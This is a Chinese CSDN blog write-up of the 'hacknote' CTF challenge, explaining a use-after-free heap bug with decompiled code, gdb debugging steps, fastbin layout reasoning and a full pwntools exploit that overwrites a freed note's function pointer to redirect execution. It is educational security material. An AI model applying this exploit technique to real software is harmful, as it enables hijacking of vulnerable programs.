Use After Free

最新推荐文章于 2024-09-19 20:53:15 发布
最新推荐文章于 2024-09-19 20:53:15 发布
阅读量1.7k 收藏 4
点赞数
分类专栏: pwn 文章标签: python 内存管理 指针 Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelxlz/article/details/118499381
版权
本文详细介绍了UseAfterFree漏洞的概念,通过分析一个名为hacknote的程序,展示了如何在删除功能中因free后未置指针为NULL而导致的野指针问题。接着,解释了Add功能中内存的分配过程,并提出了利用该漏洞的策略,即通过修改已释放chunk的puts指针来执行任意函数。最后,给出了利用漏洞的exploit代码片段。
摘要由CSDN通过智能技术生成
  • Author:ZERO-A-ONE
  • Date:2021-07-05

一、概念

Use after free:顾名思义,某块内存在释放后还能被用户使用;一般存在于,free后没有将指针置为NULL,导致野指针的存在

二、例题

2.1 hacknote

我们先检查一下这个程序

(base) syc@ubuntu:~/Desktop/unlink/hacknote$ checksec hacknote 
[*] '/home/syc/Desktop/unlink/hacknote/hacknote'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

可以发现没有开启PIE,给UAF的利用留下了漏洞

我们发现这是一题常规的菜单题

int sub_8048956()
{
  puts("----------------------");
  puts("       HackNote       ");
  puts("----------------------");
  puts(" 1. Add note          ");
  puts(" 2. Delete note       ");
  puts(" 3. Print note        ");
  puts(" 4. Exit              ");
  puts("----------------------");
  return printf("Your choice :");
}

void __cdecl __noreturn main()
{
  int v0; // eax
  char buf; // [esp+8h] [ebp-10h]
  unsigned int v2; // [esp+Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      read(0, &buf, 4u);
      v0 = atoi(&buf);
      if ( v0 != 2 )
        break;
      Delete();
    }
    if ( v0 > 2 )
    {
      if ( v0 == 3 )
      {
        print();
      }
      else
      {
        if ( v0 == 4 )
          exit(0);
LABEL_13:
        puts("Invalid choice");
      }
    }
    else
    {
      if ( v0 != 1 )
        goto LABEL_13;
      Add();
    }
  }
}

一共有四个功能:

  • Add:添加一个
  • Delete:删除一个
  • Print:打印
  • Exit:退出
2.1.1 Delete

我们看一下删除功能

unsigned int sub_80487D4()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf; // [esp+8h] [ebp-10h]
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, &buf, 4u);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 >= dword_804A04C )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( ptr[v1] )
  {
    free(*((void **)ptr[v1] + 1));
    free(ptr[v1]);
    puts("Success");
  }
  return __readgsdword(0x14u) ^ v3;
}

我么可以发现free并没有将指针清零0,导致了野指针的存在,也就是存在Use After Free

2.1.2 Add

我们看一下Add的功能

unsigned int sub_8048646()
{
  _DWORD *v0; // ebx
  signed int i; // [esp+Ch] [ebp-1Ch]
  int size; // [esp+10h] [ebp-18h]
  char buf; // [esp+14h] [ebp-14h]
  unsigned int v5; // [esp+1Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  if ( dword_804A04C <= 5 )
  {
    for ( i = 0; i <= 4; ++i )
    {
      if ( !notelist[i] )
      {
        notelist[i] = malloc(8u);
        if ( !notelist[i] )
        {
          puts("Alloca Error");
          exit(-1);
        }
        *(_DWORD *)notelist[i] = print_note_content;
        printf("Note size :");
        read(0, &buf, 8u);
        size = atoi(&buf);
        v0 = notelist[i];
        v0[1] = malloc(size);
        if ( !*((_DWORD *)notelist[i] + 1) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Content :");
        read(0, *((void **)notelist[i] + 1), size);
        puts("Success !");
        ++dword_804A04C;
        return __readgsdword(0x14u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full");
  }
  return __readgsdword(0x14u) ^ v5;
}
  • 先申请一个大小为8byte的chunk0,将其地址放入notelist[i]中
  • 再申请自己规定字节大小的chunk1,将其地址放入第一次申请的chunk0的content中
  • 第一次申请的8byte的chunk0的put处存放print_note_content函数地址content处存放第二次申请的chunk1的地址
  • 我们后面写内容是往第二次申请的chunk1中填写的

我们可以简单来看一下每一个 note 生成的具体流程

  1. 程序申请 8 字节内存用来存放 note 中的 put 以及 content 指针。

  2. 程序根据输入的 size 来申请指定大小的内存,然后用来存储 content。

       +-----------------+                       
   |   put           |                       
   +-----------------+                       
   |   content       |       size              
   +-----------------+------------------->+----------------+
                                          |     real       |
                                          |    content     |
                                          |                |
                                          +----------------+

假设我们申请了一个32byte的chunk1,往里面填写’aaaa’,最终会达到这样一个效果
在这里插入图片描述

2.1.3 Print

print_note 就是简单的根据给定的 note 的索引来输出对应索引的 note 的内容

unsigned int print_note()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf; // [esp+8h] [ebp-10h]
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, &buf, 4u);
  v1 = atoi(&buf);
  if ( v1 < 0 || v1 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( notelist[v1] )
    notelist[v1]->put(notelist[v1]);
  return __readgsdword(0x14u) ^ v3;
}
2.1.4 调试

我们可以在0x8048A7C的位置设置一个断点查看,然后申请一个内存
在这里插入图片描述

然后可以发现我们成功申请了一个堆块,而且第一个内容指向了puts,第二个内容指向了我们的内容
在这里插入图片描述

因为没有开启PIE所以我们可以知道notelist[1]放在0x804A050里
在这里插入图片描述

在这里插入图片描述

然后我们将其释放掉
在这里插入图片描述

我们可以发现指针依然存在着
在这里插入图片描述

所以我们可以利用这个UAF

2.1.5 利用

那我们只需要劫持一个content的puts指针位就好

那么,根据我们之前在堆的实现中所学到的,显然 note 是一个 fastbin chunk(大小为 16 字节)。我们的目的是希望一个 note 的 put 字段为 magic 的函数地址,那么我们必须想办法让某个 note 的 put 指针被覆盖为 magic 地址。由于程序中只有唯一的地方对 put 进行赋值。所以我们必须利用写 real content 的时候来进行覆盖。具体采用的思路如下

  • 申请 note0,real content size 为 16(大小与 note 大小所在的 bin 不一样即可)
  • 申请 note1,real content size 为 16(大小与 note 大小所在的 bin 不一样即可)
  • 释放 note0
  • 释放 note1
  • 此时,大小为 16 的 fast bin chunk 中链表为 note1->note0
  • 申请 note2,并且设置 real content 的大小为 8,那么根据堆的分配规则
  • note2 其实会分配 note1 对应的内存块。
  • real content 对应的 chunk 其实是 note0。
  • 如果我们这时候向 note2 real content 的 chunk 部分写入 magic 的地址,那么由于我们没有 note0 为 NULL。当我们再次尝试输出 note0 的时候,程序就会调用 magic 函数

常见的先编写函数

from pwn import *

r = process('./hacknote')


def addnote(size, content):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)


def delnote(idx):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))


def printnote(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))

在申请完资源后下一个断点,可以发现的确申请了两个大小为0x10的堆块,两个为0x28的堆块
在这里插入图片描述

然后在释放我们查看一下,都已经释放了加入fastbin的列表
在这里插入图片描述

我们可以知道

  • 0x87ef000:notelist[0].puts

  • 0x87ef010:notelist[1].puts

  • 0x87ef038:notelist[0].content

  • 0x87ef048:notelist[1].content

如果我们可以获得其中一个notelist的puts指针的修改我们就可以达到目标了, 根据分配规则我们可以知道只要我们申请一个大小为8的notelist,系统就会从fastbin列表中同时取出两个大小为0x10的chunk,届时:

  • 0x87ef010:new_notelist[0].puts
  • 0x87ef000:new_notelist[0].content

我们就可以通过新的notelist修改掉旧的notelist[0].puts,然后再利用之前notelist[0]的指针执行print功能就会调用新修改后的nnew_notelist[0].content,执行任意函数了
在这里插入图片描述

我们发现确实修改成特定地址了,完整的EXP如下:

from pwn import *
context.log_level = 'debug'
context(arch='i386', os='linux')
local = 1
elf = ELF('./hacknote')
if local:
    p = process('./hacknote')
    libc = elf.libc
else:
    p = remote('172.16.229.161',7001)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#onegadget64(libc.so.6)  0x45216  0x4526a  0xf02a4  0xf1147
def bk(addr):
    gdb.attach(p,"b *"+str(hex(addr)))
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr)))

def addnote(size, content):
    p.recvuntil(":")
    p.sendline("1")
    p.recvuntil(":")
    p.sendline(str(size))
    p.recvuntil(":")
    p.sendline(content)


def delnote(idx):
    p.recvuntil(":")
    p.sendline("2")
    p.recvuntil(":")
    p.sendline(str(idx))


def printnote(idx):
    p.recvuntil(":")
    p.sendline("3")
    p.recvuntil(":")
    p.sendline(str(idx))


#gdb.attach(r)
magic = 0x08048986

addnote(32, "aaaa") # add note 0
addnote(32, "ddaa") # add note 1
debug(0)
delnote(0) # delete note 0
delnote(1) # delete note 1

addnote(8, p32(magic)) # add note 2

printnote(0) # print note 0

p.interactive()
ZERO-A-ONE
关注
专栏目录
use after free 引起KE
兰宝的专栏
10-12 839
问题背景: 待机状态下,按Power键或者自动进入休眠,必现KE。 分析过程: 取出mtklog看到有db产生,确实发生了KE(kernel exception),取出db和vmlinux (必须是和当前软件是同一次编译的)后,使用GAT工具解开db,取出SYS_MINI_RDUMP,使用 gdb调试: $ arm-linux-androideabi-gdb v
堆溢出----Use After Free
qq_42192672的博客
10-23 4814
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/ 不得不说有些被坑的感觉,Off-By-One也太难了,问了下大神,我觉得还是先把这个弄懂,那篇学习记录我就先咕咕咕了 以下截图来自CTFWIKI,感觉说的概念挺明确的 从这里我深刻体会到了栈和堆的不同,以及堆的困难,没有EIP给我直接...
堆利用_Use After Free
最新发布
zhuo1358的博客
09-19 726
设想一下,如果我们申请0x8大小的chunk,那么他的大小刚好等于0x10,申请的时候就不会从新分配空间,而是从fastbin里面取出来,那么我们就可以对其中有一个chunk进行编辑。(有点绕,请仔细理解一下),答案是肯定的。内存块被释放后,其对应的指针没有被设置为NULL,但是在下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能出现问题。内存块被释放后,其对应的指针没有被设置为NULL,在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序有可能可以正常运转。
堆利用 - Use After Free
yms0211的博客
03-22 1130
堆利用 - Use After Free 概述: Use after free ,直译过来就是在释放后再利用,那么是怎么在释放后再利用的呢? 其实这个释放后再利用主要是因为在程序中原本指向某些函数或堆块的指针在堆块被free或函数结束后指针本身确没有被置空,那么这个没有被置空的指针所在的堆块虽然被释放了,但是我们却还可以通过程序内对堆块内部的操作来执行这个指针指向的函数。 #以下的内容截取自CTF-wiki# 堆块被释放后一般有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后
好好说话之Use After Free
hollk’s blog
09-28 5002
到了Use After Free啦,总体来说这种手法并不复杂,特征也很明显,就是在静态分析阶段观察释放chunk之后指针是否置空。本以为参加hw会往后拖更,没想到这么快就写完了。如果前面一直跟着学的话这部分也应该难不到你,我会在接下来的Fastbin Attack等你,加油~
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 3万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
警告背后的use after free
兰宝的专栏
10-11 2194
问题背景: 工模测试出现自动重启。 分析过程: 用GAT解开db,并结合对应的vmlinux(该文件必须和db一致,具体请看FAQ06985),利用工具E-Consulter分析(也可以参考FAQ13941),分析里几个db发现都是内存踩坏,随机踩,这种情况要么是软件引入的,要么是硬件故障。 做以下调查: 单体复现还是多台机器出现?什么时候出现?之前是否就存在?复现概
heap use after free
06-28
堆使用后释放错误(heap use after free)是指在程序中使用了已经被释放的堆内存。这种错误通常会导致程序崩溃或者出现不可预测的行为。为了避免这种错误,程序员需要在使用完堆内存后及时释放它,并且在释放后不再...
pwn 之use_after_free
Maxmalloc的博客
12-08 557
题目链接 先贴出源代码 add_note notelist[i] = malloc(8u); ... *(_DWORD *)notelist[i] = print_note_content; printf(&amp;quot;Note size :&amp;quot;); read(0, &amp;amp;amp;buf, 8u); size = atoi(&amp;amp;am...
Use-After-Free
weixin_30343157的博客
07-20 132
0x00 UAF利用原理 uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(这个指针可以称为恶性迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 0x01UAF漏洞的利用步骤 (1)先精心构造一个迷途指针 (2)再精心构造数据填充被释放的内存区域 (3)再次使用该指针,改变程序流程 0x02 Pwnable.kr-...
use-after-free漏洞发现之旅use-after-free漏洞发现之旅
weixin_33851177的博客
03-20 679
2019独角兽企业重金招聘Python工程师标准>>> ...
Use After Free Tutorial
sdulibh的专栏
08-09 3206
Halvar Flake 在”Third Generation Exploitation”中,按照攻击的难度把漏洞利用技术分为了3个层次: (1) 第一类是基础的栈溢出利用。攻击者可以利用返回地址等轻松劫持进程,植入shellcode,例如,对strcpy,strcat等函数进行攻击。 (2) 第二类是高级的栈溢出漏洞。这时,栈中有许多限制因素。 (3) 第三类攻击则是堆溢出利用及格式化串漏
[pwn]堆:Use After Free
Breeze的博客
09-06 8626
Use After Free:time_formatter writeup UAF漏洞就是Use After Free,再释放后继续使用,Use After Free会引发各种奇怪的现象,根据场景的不同并没有一种统一的利用方式。下面看题目:time_formatter 日常惯例,先查看安全策略: 开启了canary、NX、ASLR,然后查看一下程序逻辑: 很常见的堆菜单,下面查看一下各种功能:...
堆溢出漏洞之UAF--(Use After Free)
半岛铁盒的博客
06-02 1000
具体原理 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释放以后进行use。当我们重新申请与之前释放掉的内存大小相同的块时,就会就先问题. 可以继续使用之前释放掉的那块内存。但是再次使用时,因为指针指向的内存包含的数据不是原来的数据了,此时的引用对于正常程序来说是有风险的; 这是个UAF的错误例子 ...
use-after-free漏洞-hacknote
qq_43390703的博客
10-17 1254
hacknote 经典的use-after-free漏洞。 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值